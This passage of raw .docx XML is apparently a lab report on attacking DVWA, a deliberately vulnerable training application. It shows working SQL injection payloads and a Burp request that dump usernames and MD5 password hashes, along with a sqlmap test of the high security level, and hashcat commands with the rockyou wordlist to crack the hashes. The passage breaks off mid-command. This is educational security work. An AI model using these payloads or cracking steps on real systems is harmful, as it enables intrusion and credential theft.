          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>2' UNION SELECT database(), version() -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 5 - Extract credentials via Burp Repeater (GET request):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>GET /dvwa/vulnerabilities/sqli/?id='+UNION+Select+user%2Cpassword+FROM+users+--+-&amp;Submit=Submit# HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: 192.168.100.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Cookie: security=low; PHPSESSID=&lt;session&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Decoded payload used in the id parameter:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">' UNION Select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM users -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0A70C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Medium Security Level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F4032" w14:paraId="10EC3746" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="4B0548BB" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="24C411D1" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="67700CCA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="511142AF" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Injection point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E380DA4" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>id POST parameter (dropdown select, not free text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="3F9F6E58" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A794C6" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vulnerable code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48033F47" w14:textId="2D4D6AE9" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="0044489C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>first_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>last_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM users WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> = '$id'; — no sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="30DC03DF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="625900DB" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Confirmation payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B82B810" w14:textId="66AF5333" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="009A3E3A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1 or 1=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="28E67455" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038D557C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Data extraction payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="601536DC" w14:textId="53407286" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="009A3E3A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1 or 1=1 UNION SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>user,password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> from users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A3E3A" w14:paraId="34E5DEC7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C09B5A0" w14:textId="77777777" w:rsidR="009A3E3A" w:rsidRPr="00A00449" w:rsidRDefault="009A3E3A" w:rsidP="009A3E3A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B897F50" w14:textId="148EC378" w:rsidR="009A3E3A" w:rsidRPr="00A00449" w:rsidRDefault="009A3E3A" w:rsidP="009A3E3A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00449">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Full dump of usernames and MD5 password hashes for all 5 users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4977C19E" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 High Security Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E68F8C" w14:textId="707700EC" w:rsidR="001419E9" w:rsidRDefault="001419E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00449">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Confi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rm Automated testing with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLMAP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">level </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 ,risk</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3,all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection techniques) against the High security level’s id parameter confirmed no exploitable SQL injection vector </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exists.This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> validates that the combination of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql_real_escape_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and strict </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) input validation is an effective mitigation against this vulnerability class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE91A1F" w14:textId="77777777" w:rsidR="00981708" w:rsidRDefault="00981708">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE58B7D" wp14:editId="20D6D286">
            <wp:extent cx="5943600" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="310638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F7E58E1" w14:textId="7A7D1705" w:rsidR="00981708" w:rsidRDefault="00981708">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="056E35B7" wp14:editId="622AD915">
            <wp:extent cx="5943600" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2104069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7F3E5DFB" w14:textId="5971F372" w:rsidR="00981708" w:rsidRDefault="00981708">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AAB68BF" wp14:editId="4B24E9D1">
            <wp:extent cx="5935980" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1024307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457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="472BCB3F" w14:textId="77777777" w:rsidR="00981708" w:rsidRDefault="00981708" w:rsidP="00981708">
      <w:pPr>
        <w:pStyle w:val="Strong1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57913FE3" w14:textId="4622FC09" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5. Post-Exploitation — Password Hash Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CBC0E" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00449">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hash type identified: MD5 (unsalted, 32-character hex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD7680F" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00A00449" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00449">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Commands executed (in order):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFF4C6" w14:textId="77777777" w:rsidR="00CF4032"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Step 1 - Create hash file:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>nano hashes.txt</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(pasted the following, one hash per line)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>e99a18c428cb38d5f260853678922e03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 2 - Check wordlist availability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>ls /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step 3 - Unzip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w: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gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step 4 - Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the hash file:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 hashes.txt /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 5 - Display cracked results:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
